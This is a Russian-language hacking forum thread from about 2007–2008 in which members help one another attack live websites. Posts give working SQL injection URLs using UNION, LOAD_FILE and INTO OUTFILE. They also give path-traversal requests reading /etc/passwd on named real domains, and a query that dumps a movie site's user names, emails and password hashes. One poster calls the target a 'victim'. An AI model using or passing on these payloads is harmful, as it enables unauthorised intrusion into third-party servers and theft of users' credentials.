Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Ничего полезного там нет :(
     
  2. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    почему шелл при попытке открыть etc/passwd или прочитать другой каталог выше самого сайты выдает ошибку HTTP Ошибка 406 - Не приемлемо
    safe_mode 0, open_basedir no value
     
  3. saynt2day

    saynt2day New Member

    Joined:
    21 Sep 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    LOAD_FILE на Masterhost

    Жертва находится на Masterhost.

    1) нашёл инъекцию, пытаюсь прочитать файл, например так:
    http://SITE_NAME.com/cgi-bin/library/com/perl/controller.cgi?action=get&uid='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,LOAD_FILE('/home/u53608/SITE_NAME.com/www/english/index.html'),30,'31

    Запрос срабатывает, но содержимое файла index.html не показывается. Можно ли узнать, есть ли у пользователя MySQL права на чтение и создание файлов? Или я просто неверно указываю путь к файлу.


    2) может быть кто уже знает, есть ли у пользователя MySQL права на чтение и создание файлов?
     
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    1)Попробуй перевести запрос в Char()
    2)Не всегда
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    saynt2day
    select file_priv from mysql.user where username='user'
    где user - имя пользователя от которого работает мускуль
    узнать через функцию user()
     
  6. presidentua

    presidentua милиционер Античата

    Joined:
    4 Nov 2007
    Messages:
    305
    Likes Received:
    236
    Reputations:
    15
    Уже запарился пользоваться поиском - нифига не выводит по теме.
    Где-то была темка в которой выкладывали список часто-юзаемых имен таблиц и столбцов для брутфорса. Подскажите ее, плиз?
     
    2 people like this.
  7. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    _https://forum.antichat.ru/thread45790.html
     
    1 person likes this.
  8. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    при -1+union+select+'1'+into+outfile+'/var/111'/* выдает ошибку Can't create/write to file ......(Errcode: 13) читать файлы можна) это значит права выставлены на папку и нада найти подходящую папку для аплоада или тут чет другое?)
     
  9. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    (Errcode: 13) - нет прав на запись, ищи другую папку... ;)
     
    1 person likes this.
  10. GoleM

    GoleM New Member

    Joined:
    12 Apr 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Интересует такой вопрос:
    Допустим что на сайте есть php уязвимость, для чего в ссылки вида
    http://www.site.ru/index.php?file=
    подставлять ../../../../../../../etc/passwd
    Вот сделал такой запрос http://www.site.ru/index.php?file=../../../../../../../etc/passwd
    и после такого запроса открывается файл passwd, какую информацию я могу получить из этого файла
     
  11. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    из него можно узнать лоигны пользователей, пути к их домашним директориям и наличие у них действующего интерпретатора.
     
  12. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://ru.wikipedia.org/wiki//etc/passwd
     
  13. GoleM

    GoleM New Member

    Joined:
    12 Apr 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Ну вот например
    http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
    http://www.movitel.co.cu/descarga.php?file=../../../../../../../../etc/passwd
    Вот что от сюда можно извлеч?
    Прост много почитал статей про php инъекции, но не всё усвоил
     
  14. saynt2day

    saynt2day New Member

    Joined:
    21 Sep 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0

    1) в char мне кажется смысла переводить нет, т.к кавычки не фильтруются и запрос срабатывает.
    2) тут мне было интересно, может быть кто уже знает наверняка, есть у пользователя MySQL хостинга masterhost по умолчанию права на доступ к файлам.

    к сожалению прав доступа к БД mysql у пользователя user() нет.
     
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    saynt2day, попробуй load_file('/etc/passwd') или зарегай там акк и посмотри какой полный путь будет у тебя и по аналогии подбери путь до жертвы.
     
  16. saynt2day

    saynt2day New Member

    Joined:
    21 Sep 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    На примере другого мастерхостовского сайта выяснил, как выглядят у них пути:

    http://www.mobil-life.ru/phones/catalog/?cat=1&madeby=2%27

    /home/u20726/mobil-life.ru/www/index.php

    Но штука в том, что у нужного мне сайта несколько доменных имён, которые все ведут на один сайт.

    Пытаюсь прописывать все эти домены в SITE_NAME:
    /home/ACCOUNT/SITE_NAME/www/

    и ничего...
     
  17. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Помогите раскрутить баг:
    http://www.mymovie.in.ua/film_info.php?film_id=323
    http://www.mymovie.in.ua/film_info.php?film_id=324-1
    http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/UNION/**/SELECT/**/1,2,3/*
    http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/4/*
    http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/3/*
    Не получается подобрать число полей, по GROUP BY получается что должно быть 3 поля, но нет.
     
    1 person likes this.
  18. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Code:
    http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+version()/*
     
  19. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Благодарю, krypt3r за помощь

    Нашел таблицу юзеров:
    Code:
    http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+concat(name,0x3a,email,0x3a,pass)+from+user/*
    Жаль, алгоритм хеширования не из числа популярных
     
  20. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0
    MySQL_64bit
     
Thread Status:
Not open for further replies.